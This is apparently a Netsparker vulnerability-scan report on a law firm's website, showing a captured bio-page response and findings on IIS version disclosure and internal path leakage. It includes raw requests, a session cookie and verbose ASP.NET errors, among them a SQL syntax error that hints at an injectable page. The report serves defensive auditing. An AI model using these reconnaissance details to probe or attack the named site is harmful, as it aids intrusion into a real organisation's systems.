//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

</HEAD>
<style>
A {text-decoration:none;
color:#666666;
font-face:arial;
font-size:11px}
A:Hover{
text-decoration:none;
color:#000000;
font-face:arial;
font-size:11px
}
</style>

<body id="homepage" link="#666666" vlink="#666666" alink="#666666" style="margin-top:0px;margin-bottom:0px" leftmargin=0 bottommargin=0 rightmargin=0 onLoad="decryptAll();">

<table id="pagetable" cellpadding=0 cellspacing=0 border=0 height="100%" width="100%">

<tr><td style="height:3%">&nbsp;</td></tr>

<tr>

<td style="height:94%" align="center" valign="middle">

<!--<td align="center" valign="middle"> -->

<table cellpadding =0 cellspacing =0>
<tr>
<td width="10%">&nbsp;</td>

<td width="80%" valign="middle">
<form name="Form1" method="post" action="homenew.aspx?searchlink=showbionew&amp;Show=1121" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwtMTA1OTU1Njc2ODt0PDtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw+YWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw+Oz4+Ozs+Oz4+O3Q8O2w8aTwwPjtpPDQ+Oz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjtpPDE+O2k8Mj47aTwzPjtpPDQ+O2k8NT47aTw2PjtpPDc+O2k8OT47aTwxMT47PjtsPHQ8cDxwPGw8SW1hZ2VVcmw7PjtsPGltYWdlcy9CaW8vNTI3Nl9JbWFnZS5qcGc7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7PjtsPFw8YnJcPjI2NSBGcmFua2xpbiBTdHJlZXRcPGJyXD5Cb3N0b24sIE1BIDAyMTEwXDxCclw+Oz4+Oz47Oz47dDxwPHA8bDxUZXh0Oz47bDxcPGJyXD5UIDYxNy40NDkuNjUxNTs+Pjs+Ozs+O3Q8cDxwPGw8VGV4dDs+O2w8XDxiclw+RiA2MTcuMzI2LjMwNzg7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7PjtsPFw8YnJcPkUgXDxhIGVuY3J5cHRlZD0idHJ1ZSIgaHJlZj0ibWFpbHRvOnFzdXJoa3BnQHdmeWV6cHN2LnphcSIgXD5id2lubmlja0BtY2NhcnRlci5jb21cPC9hXD47Pj47Pjs7Pjt0PHA8cDxsPE5hdmlnYXRlVXJsO1Zpc2libGU7PjtsPGdldHZjYXJkLmFzcHg/aWQ9MTEyMTtvPHQ+Oz4+Oz47Oz47dDxwPHA8bDxUZXh0Oz47bDxCVVJUT04gV0lOTklDSzs+Pjs+Ozs+O3Q8cDxwPGw8VGV4dDs+O2w8UEFSVE5FUjs+Pjs+Ozs+O3Q8cDxwPGw8TmF2aWdhdGVVcmw7VmlzaWJsZTs+O2w8aG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2Jpb25ldyZzaG93PTExMjEmUmVsYXRlZD1BcnRpY2xlcztvPHQ+Oz4+Oz47Oz47dDxwPHA8bDxOYXZpZ2F0ZVVybDtWaXNpYmxlOz47bDxob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YmlvbmV3JnNob3c9MTEyMSZSZWxhdGVkPUNhc2VzO288dD47Pj47Pjs7Pjs+Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPF8hSXRlbUNvdW50Oz47bDxpPDI1Pjs+PjtsPGk8MD47aTwyPjtpPDQ+O2k8Nj47aTw4PjtpPDEwPjtpPDEyPjtpPDE0PjtpPDE2PjtpPDE4PjtpPDIwPjtpPDIyPjtpPDI0PjtpPDI2PjtpPDI4PjtpPDMwPjtpPDMyPjtpPDM0PjtpPDM2PjtpPDM4PjtpPDQwPjtpPDQyPjtpPDQ0PjtpPDQ2PjtpPDQ4Pjs+O2w8dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xIiBjbGFzcz0iYm9keWNvcHkiXD5CYW5rcnVwdGN5ICYgUmVzdHJ1Y3R1cmluZyBcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xNCIgY2xhc3M9ImJvZHljb3B5Ilw+QnVzaW5lc3MgJiBGaW5hbmNpYWwgU2VydmljZXMgTGl0aWdhdGlvbiBcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xMSIgY2xhc3M9ImJvZHljb3B5Ilw+Q29uc3RydWN0aW9uXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTUiIGNsYXNzPSJib2R5Y29weSJcPkNvcnBvcmF0ZSwgU2VjdXJpdGllcyBhbmQgRmluYW5jaWFsIEluc3RpdHV0aW9uc1w8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTM4MjQiIGNsYXNzPSJib2R5Y29weSJcPkNyaXNpcyBNYW5hZ2VtZW50XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MzU0MCIgY2xhc3M9ImJvZHljb3B5Ilw+RS1EaXNjb3ZlcnlcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0zIiBjbGFzcz0iYm9keWNvcHkiXD5FbnZpcm9ubWVudGFsXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MjMiIGNsYXNzPSJib2R5Y29weSJcPkV4ZWN1dGl2ZSBDb21wZW5zYXRpb25cPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xOSIgY2xhc3M9ImJvZHljb3B5Ilw+RnJhbmNoaXNpbmcgYW5kIERpc3RyaWJ1dGlvbiBMYXdcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0yMCIgY2xhc3M9ImJvZHljb3B5Ilw+R292ZXJubWVudCBDb250cmFjdHNcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz05IiBjbGFzcz0iYm9keWNvcHkiXD5Hb3Zlcm5tZW50IEludmVzdGlnYXRpb25zICYgV2hpdGUgQ29sbGFyIENyaW1pbmFsIERlZmVuc2VcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz01IiBjbGFzcz0iYm9keWNvcHkiXD5IZWFsdGggQ2FyZVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE4IiBjbGFzcz0iYm9keWNvcHkiXD5JbW1pZ3JhdGlvblw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTYiIGNsYXNzPSJib2R5Y29weSJcPkluc3VyYW5jZSBDb3ZlcmFnZVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTEyIiBjbGFzcz0iYm9keWNvcHkiXD5JbnRlbGxlY3R1YWwgUHJvcGVydHkvSW5mb3JtYXRpb24gVGVjaG5vbG9neVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTI3MjYiIGNsYXNzPSJib2R5Y29weSJcPkludGVybmF0aW9uYWxcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0yMiIgY2xhc3M9ImJvZHljb3B5Ilw+SW52ZXN0bWVudCBNYW5hZ2VtZW50XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MiIgY2xhc3M9ImJvZHljb3B5Ilw+TGFib3IgJiBFbXBsb3ltZW50IExhd1w8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTQiIGNsYXNzPSJib2R5Y29weSJcPlByaXZhdGUgQ2xpZW50c1w8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTciIGNsYXNzPSJib2R5Y29weSJcPlByb2R1Y3QgTGlhYmlsaXR5XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTMiIGNsYXNzPSJib2R5Y29weSJcPlB1YmxpYyBGaW5hbmNlXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MjEiIGNsYXNzPSJib2R5Y29weSJcPlB1YmxpYyBTdHJhdGVneVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTgiIGNsYXNzPSJib2R5Y29weSJcPlJlYWwgRXN0YXRlXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTciIGNsYXNzPSJib2R5Y29weSJcPlJlZGV2ZWxvcG1lbnRcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xMCIgY2xhc3M9ImJvZHljb3B5Ilw+VGF4ICYgQmVuZWZpdHNcPC9hXD47Pj47Oz47Pj47Pj47Pj47Pj47Pj47PvD9ukv1htSwKHH9Aruwcsdp/a0N" />

<table cellpadding=0 cellspacing=0 border=0>

<tr>
<td colspan=2 width="100%">

<style>
A {text-decoration:none;
color:#969696;
font-face:arial;
font-size:11px}
A:Hover{
text-decoration:none;
color:#ffffff;
font-face:arial;
font-size:11px
}
</style>
<div>
<table style="height:225px;MARGIN-TOP:0px;MARGIN-BOTTOM:0px;BORDER-TOP:0px;BORDER-BOTTOM:0px;BORDER-RIGHT: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid"
cellpadding="0" cellspacing="0">
<tr>
<td width="9"><img src="images/spacer.jpg" border=0 width="9px"></td>
<td style="width:328;height:225" valign=top bgcolor="#000000">
<table cellspacing=0 cellpadding=0 border=0 width="328px" height="225px" bgcolor="#000000" >
<tr>
<td width=9px>&nbsp;</td>
<td width="150px" valign="top"><br><img id="_ctl0_BioImage" src="images/Bio/5276_Image.jpg" alt="" border="0" /></td>
<td valign="top"><span id="_ctl0_BioAddress" style="color:#969696"><br>265 Franklin Street<br>Boston, MA 02110<Br></span>
<span id="_ctl0_BioPhone" style="color:#969696"><br>T 617.449.6515</span>
<span id="_ctl0_BioFax" style="color:#969696"><br>F 617.326.3078</span>
<span id="_ctl0_BioEmail" style="color:#969696"><br>E <a encrypted="true" href="mailto:qsurhkpg@wfyezpsv.zaq" >bwinnick@mccarter.com</a></span>
<span id="Biosheader_BioPhone" style="color:#969696"><br/>
<a id="_ctl0_vcardlink" href="getvcard.aspx?id=1121"><img src="images/vcard2.gif" border="0"/> v-card</a><br> <a href="showbionewprint2.aspx?PrintPage=True&show=1121"><img src="images/printIcon.gif" border="0"/> print</a><br>
</span>
</td>
</tr>
</table>
</td>
<td style="width:452px;height:225px" valign=top bgcolor="#969696">
<table cellspacing=0 cellpadding=0 border=0 width="452px" height="225px" bgcolor="#969696" >
<tr><td width=9px valign="top"><br></td>
<td valign="top">
<br>
<span style="font-size:22px;color:#ffffff">
<span id="_ctl0_BioName">BURTON WINNICK</span>
</span..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx

Extracted Version

Microsoft-IIS/6.0

Request

GET /new/showlocationnew.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4338


<html>
<head>
<title>Incorrect syntax near '='.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '='.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '='.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '='.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '='.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)

3 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.

External References

- /new/about.aspx

/new/about.aspx

http://www.mccarter.com/new/about.aspx

Identified Internal Path(s)

C:\inetpub\www.mccarter.com\new\about.aspx

Request

GET /new/about.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=representativemattersnew
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:19:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3179


<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>The resource cannot be found.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>HTTP 404. The resource you are looking for (or one of its dependencies) could have been removed, had its name changed, or is temporarily unavailable. Please review the following URL and make sure that it is spelled correctly.
<br><br>

<b> Requested Url: </b>/new/about.aspx<br><br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[FileNotFoundException]: C:\inetpub\www.mccarter.com\new\about.aspx
at System.Web.UI.TemplateParser.GetParserCacheItem()
at System.Web.UI.TemplateControlParser.CompileAndGetParserCacheItem(String virtualPath, String inputFile, HttpContext context)
at System.Web.UI.TemplateControlParser.GetCompiledInstance(String virtualPath, String inputFile, HttpContext context)
at System.Web.UI.PageParser.GetCompiledPageInstanceInternal(String virtualPath, String inputFile, HttpContext context)
at System.Web.UI.PageHandlerFactory.GetHandler(HttpContext context, String requestType, String url, String path)
at System.Web.HttpApplication.MapHttpHandler(HttpContext context, String requestType, String path, String pathTranslated, Boolean useAppConfig)
[HttpException]: Exception of type System.Web.HttpException was thrown.
at System.Web.HttpApplication.MapHttpHandler(HttpContext context, String requestType, String path, String pathTranslated, Boolean useAppConfig)
at System.Web.MapHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/locations.aspx

/new/locations.aspx

http://www.mccarter.com/new/locations.aspx

Identified Internal Path(s)

C:\inetpub\www.mccarter.com\new\bottom.ascx

Request

GET /new/locations.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=representativemattersnew
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:19:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5584


<html>
<head>
<title>Parser Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Parser Error</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
<br><br>

<b> Parser Error Message: </b>Unknown server tag 'uc1:NewsScroller1'.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

Line 37: sMarquee1 = &quot;&lt;marquee id=news1 scrolldelay=1 align=left valign=top direction=up behavior=slide scrollamount=1 width=100% height=27px&gt;&quot;;
Line 38: }
<font color=red>Line 39: sMarquee1 = sMarquee1 + &quot;&lt;uc1:NewsScroller1 id=Newsscroller1 runat=server/&gt;&quot;
</font>Line 40: if (navigator.appName == &quot;Netscape&quot;)
Line 41: {</pre></code>

</td>
</tr>
</table>

<br>

<b> Source File: </b> C:\inetpub\www.mccarter.com\new\bottom.ascx<b> &nbsp;&nbsp; Line: </b> 39
<br><br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
